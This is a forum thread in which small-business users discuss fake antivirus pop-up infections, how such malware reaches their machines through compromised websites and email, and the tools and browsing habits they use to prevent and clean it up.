A thought on these pop up virus attacks

[binki]

We have had a few of these and I am scratching my head on how they are getting in. These are the popups that say you have a virus, click here to fix and all hell breaks loose afterward.

Here is what I think so far. I have experience on 4 networks. On 2 of the networks we turn the router off every night. The other 2 stay on 24x7.

Now I am not sure but I believe we get a new IP when we restart the router.

My thought is the networks that stay on all the time are being pounced on just randomly, kind of like fishing. The ones that turn off don't have the problem because they are not always available.

Not sure if this theory holds water but that is the only difference I can find so far.

Can anyone else offer some collaboration on this?

 

[oldgoatroper]

Somebody has been visiting sites with a drive-by download...

 

[SignBurst PCs]

I think that you are on the wrong track.

First, you probably have multi-day leases on your IP addresses. If you router is down for several hours, you will still get the same IP when you return. This has almost nothing to do with being infected.

You are probably not getting these malware infections by being hacked (through the router). These infections are mainly spread through infected websites and others through email. There are other possible ways to be infected, but they are statistically rare.

Casual surfing is usually the cause for these infections. I always recommend that my clients keep "unnecessary" surfing to a minimum on their critical computers as it is usually the cause of their infection and frustration.

 

[binki]

The sites visited on one of the networks that got an infection were normal sites. What the font, fonts 101 and the like when I got the last attack.

Could it be one of those sites got infected and was pushing bad stuff?

 

[SignBurst PCs]

The sites visited on one of the networks that got an infection were normal sites. What the font, fonts 101 and the like when I got the last attack.

Could it be one of those sites got infected and was pushing bad stuff?

Absolutely. ANY web site/server can be infected. Some are much safer than others. In general, the less mainstream the website, the more likely it is to be compromised. This is not always a true, but it is a good thing to remember.

 

[veloxgraphics]

Also... running noscript in firefox GREATLY reduces automated processes within websites from doing anything to your computer.

Smart surfing is the best practice, however. I dont know how many times someone has called me to fix their machine, and will swear up and down that they were working within an antivirus program to clean something from the machine. So I show them how the top of their "antivirus" program still said "Internet Explorer."

Just because it looks like an application, doesnt mean it is.

 

[David Wright]

We got another last night. For sure it came from a link on yahoo.news.
My wife started to show me an article linked to the son of Marie Osmond story and the bogus virus/windows security update needed crap came up and locked me out of task manager. Closed right out and went into safe mode and windows restore and fixed it.

This is all to common now.

 

[binki]

We got another last night. For sure it came from a link on yahoo.news.
My wife started to show me an article linked to the son of Marie Osmond story and the bogus virus/windows security update needed crap came up and locked me out of task manager. Closed right out and went into safe mode and windows restore and fixed it.

This is all to common now.

Yeah, we get some of that too. It is funny because when we run Shields Up we seem to be pretty well protected.

 

[Graphics2u]

This is all to common now.

Ditto! Three times in the last two months for me.

Last night I downloaded Malwarebytes and did a scan, it found 9 infections that Microsoft Security essentials did not find! I was pretty happy with MSE until that.

 

[Techman]

They come in from compromised websites.

There are a few java exploits going around. The webmaster doesn't keep up with the java updates, or is a little slow on his update, or a new exploit is found and the maggots send it out to every website on the planet before an update can be installed.

When the java server is not update the maggots get in, redirect your browser to that popup and it loads up. If you say no it loads, if you say yes it loads. That is why popunders or popups are not good when used on a website. Many people know maggots use those to infect machines.

It only takes a few seconds and its in.
Or, you open an email with some type of script in it. Usually one of those email greetings cards.

Or you get a crack (either kind) from some underworld site and open it. A new meaning to dirty pictures?

There is scanning, intercepts, probing, and noise all over the internet. If one were to get a port monitor they would see just how much wild probing is going on all the time every day. Much of it is legal, some of it is seekers doing searchers for very rare data and some of it is just looking around just as a neighbor looks into your garage from the street.

That is why a router and a firewall is so important. A PC was designed to have 64,000 open ports to do anything you can dream of. That is the power of a PC. It is so open you can make a PC do anything you can imagine. Some try to make this open ability a handicap while others would rather die that see a PC turn into a locked box. But, those ports must be closed when not in use.

 

[Graphics2u]

That is why a router and a firewall is so important. .

Techman,
I have a router with a firewall and each computer on the network has a firewall turned on also. So what exactly do these firewalls help keep out?

 

[J Hill Designs]

Happened to me yesterday - immediately opened taskmanager and shutdown av.exe - ran combofix and all better 10 mins later

 

[Techman]

firewalls help keep out?

google is your friend

 

[choucove]

Firewalls block certain pieces of data trying to access your internal network from the internet. For instance some of this data is your website traffic, that is, HTTP documents that you are viewing on your browser has to come through a specific port on the firewall to be allowed access to your internal network. There are also other ports opened for e-mail traffic, data transfers, requesting data sent out onto the web to retrieve websites, the list goes on and on. The problem is that many times there are opened ports that should not be, which allows through data that is unwanted, such as hackers or harmful packets of code.

Now, just because you have a simple router at your location doesn't mean you are completely protected either, even if you have software firewalls running on your computers. It is relatively easy for rogue script to enable ports or allow access through the firewall on your computer. It works, but it's not the one and only answer to your defense. Additionally, while most routers do have a built-in firewall function, they do not do the more powerful functions that are needed. Many only protect or block the very lowest 1024 ports and leave the other 63,000 ports unblocked. They also do not inspect or log port traffic for use in finding weak points or preventing attacks.

This is why a simple investment can be incredibly helpful in protecting your network. Again, it's not going to forever cure every chance of receiving a virus, but it helps against many other things as well.

 

[Graphics2u]

Firewalls block certain pieces of data trying to access your internal network from the internet. For instance some of this data is your website traffic, that is, HTTP documents that you are viewing on your browser has to come through a specific port on the firewall to be allowed access to your internal network. There are also other ports opened for e-mail traffic, data transfers, requesting data sent out onto the web to retrieve websites, the list goes on and on. The problem is that many times there are opened ports that should not be, which allows through data that is unwanted, such as hackers or harmful packets of code.

Now, just because you have a simple router at your location doesn't mean you are completely protected either, even if you have software firewalls running on your computers. It is relatively easy for rogue script to enable ports or allow access through the firewall on your computer. It works, but it's not the one and only answer to your defense. Additionally, while most routers do have a built-in firewall function, they do not do the more powerful functions that are needed. Many only protect or block the very lowest 1024 ports and leave the other 63,000 ports unblocked. They also do not inspect or log port traffic for use in finding weak points or preventing attacks.

This is why a simple investment can be incredibly helpful in protecting your network. Again, it's not going to forever cure every chance of receiving a virus, but it helps against many other things as well.

Thank You. What does a person need to block all unused ports if a router doesn't block them all?

 

[choucove]

Thank You. What does a person need to block all unused ports if a router doesn't block them all?

The only thing that is going to allow you access to control all ports in your network access is a hardware firewall device. This piece of equipment goes directly between your internet and your own router. There are several options from the best name brands in networking out there especially at affordable costs. Cisco's ASA5505 and Sonicwall TZ100 are some examples of entry-level firewalls that still offer all the features a small business could want.

 

[Graphics2u]

The only thing that is going to allow you access to control all ports in your network access is a hardware firewall device. This piece of equipment goes directly between your internet and your own router. There are several options from the best name brands in networking out there especially at affordable costs. Cisco's ASA5505 and Sonicwall TZ100 are some examples of entry-level firewalls that still offer all the features a small business could want.

That's great info! Thanks!

 

[genericname]

Also... running noscript in firefox GREATLY reduces automated processes within websites from doing anything to your computer.

THIS

Step 1:
Ditch Internet Explorer for Firefox

Step 2:
Install No-Script Addon (If this gives you trouble, the least you could do is go to Tools > Options > Enable Javascript Advanced button > Uncheck all

Step 3:
Install Adblock Plus Addon

Step 4:
Dance

Nowadays we really need to be on top of our surfing practices. Aside from the passive solutions above, a good rule of thumb is to avoid the hell out of any pop-up that forces you to acknowledge it in order to remove it. As mentioned in a previous post, if it says "Cancel", it probably means "OK". If one of these show up, don't click on it; just close your browser or, failing that, kill the browser's process in task-manager. Hell, I'd rather hard-boot the PC than click on one of those buggers.

 

[binki]

THIS
... if it says "Cancel", it probably means "OK". If one of these show up, don't click on it; just close your browser or, failing that, kill the browser's process in task-manager. Hell, I'd rather hard-boot the PC than click on one of those buggers.

I first kill the internet connection, then the process unless it starts popping up a bunch of stuff, in that case I reboot.

It helps to have another computer around if needed to get the needed removal tools for special hard cases. Spybot normally takes care of most the problems. We are currently running NOD32 but will switch to MSE when our contract is up.

We are starting a practice of not connecting our shop computers to the network or internet if they are dedicated to running a machine. In those cases we just use flash drives to move the files.

All files are backed up automagically with Carbonite.